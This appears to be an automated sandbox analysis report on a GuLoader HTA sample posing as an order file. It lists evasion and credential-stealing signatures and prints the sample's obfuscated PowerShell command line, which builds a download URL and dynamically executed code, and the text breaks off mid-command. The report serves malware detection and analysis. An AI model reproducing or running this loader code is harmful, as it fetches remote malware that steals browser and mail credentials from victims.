Windows
Analysis Report
orden_0099896754537687897657436786756785654576.hta
Overview
General Information
Detection
GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Check if machine is in data center or colocation facility
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- mshta.exe (PID: 1004 cmdline: mshta.exe "C:\Users\user\Desktop\orden_0099896754537687897657436786756785654576.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
- powershell.exe (PID: 1224 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Ungelati nizables = 1;$fostre ne='Substr in';$fostr ene+='g';F unction Sk ftendes($K riminologi en){$Svane hamme54=$K riminologi en.Length- $Ungelatin izables;Fo r($Rusland srejsernes =5; $Rusla ndsrejsern es -lt $Sv anehamme54 ; $Rusland srejsernes +=(6)){$Fo rbudsbeste mmelserne+ =$Kriminol ogien.$fos trene.Invo ke($Ruslan dsrejserne s, $Ungela tinizables );}$Forbud sbestemmel serne;}fun ction bifi lar($Unkne aded){. ($Aaretags ) ($Unknea ded);}$Cap italizable =Skftendes 'PotliMTr ,ceoChiroz Aflb,i .pr rlTraadlSe xboaUnde,/ Sk,lp5Kill i.Terri0 R ger Kolb ( ,picuWildr iHelmen R atidBegy.o GratiwMoth es Quiv Po s.vNF,ereT Prepo rbe 1Angle0B r re.Tandl0T og m; ,ham FilthWUnc oniko,pen disc6Smakk 4 A yn;Lag er Dara,xM a.nm6v.rsh 4canva;Gra ve BlunrUd ovevKry.r: Grema1Giga s2hals 1Fo xes.Roddi0 H gei)Sika t TailsGUn holeDespec rattk Bon noEtuie/Ud gy 2Bauck0 K.ast1I,ko l0 Pr,z0Te rmo1Medle0 nlea1 Ble s FratrF U n.giSlaskr S afe Til mfunculo U de,xToxop/ Sptt1Idri f2.ftgt1 E p t. G sg0 Pert ';$e rgometercy kelen=Skft endes 'For s UCystosS amtie olkr S,ovl-Stin kAFo,urg L e.eeInt,rn BakketChlo r ';$Enebr rets=Skfte ndes 'Inst ihSensitSt rantUnexep Strubs Int e:P,yto/An sva/ Noncd sem.r,ett oiStyrivLb ehjeU.byt. Pole g Bri soR.dioo n dergDrosol PrizeInde x.transcHu sbuo roglm B.ob/Svve fuTen.ncpr ogn?Had ne ,iunixAnti dpEnga,oMo ater Softt Freds=Phyt odInf,roBi ogrwK.ejnn Sand l Eft o Teleaga strdoldsa& Pi.niiReso udG and= i ght1 Ur.na QueriFCoac tW Sept_Cy prabTromsU kun,tR Vi dNStok.XFr .it9Epipit Over.F onc oOpo.yg3 A ntiOStrygO Psyc,2Inve nSRibboR i ntexJivinj DeforlDobb .cSe.mlN T hinKS rti9 .arru Mer .x UdgahGl d.taSynont Svin,bspec . ';$Folio se=Skftend es 'Lydis> Upbr. ';$A aretags=Sk ftendes 'K n gliFlere eNeutrx Az im ';$Lumi narism = S kftendes ' PinnieFeri ec De.thFl efoBagga Vaad% Wort aSagebpRke e,pLandsdP ersoaEnhed t Nonda M. 
do% Begy\F oldnP emio PrisnIntu roLskedsCo lb.BannuL NonlosSpan giDimme Dr a,e&Unlik& Appe Mode reTutt.c S h,khUdenlo Gangs Dext $St re ';b ifilar (Sk ftendes 'M exic$Reclu gRumerl bo gho A.stbE piotaRverh lSentr:Tru p.B ilcrat ebrelDyarc lCrypto er sinSclereM onit=Dogli (,argicCol asmfactodS mak, phono /AnnsocBug sp Ox da$H ypa LPo.du uPaea m Ka loiTypolnR evera Anti rMineri Mi sasTalemmH jlpe)krges ');bifila r (Skftend es 'z.nev$ FictigUtro sl R,oto S p.gbP,etea Salpl Lys t:MarshzGr i.ao Jvnso Pyj msForu rpDatamo.v nfrrAmbroi ApplfCate ceHemoerIn enophotou .remasTeak e= ldef$Di aluESammen Undive Pi, sbChallrCh emorMidd.e SpidtOutd rsAffix. F r ssSvarsp R,stal.emi miDe.artIa gtt(Brier$ cl glFBusl ioBioryl A ccuiPlagio SublsCorp seAnago)Ly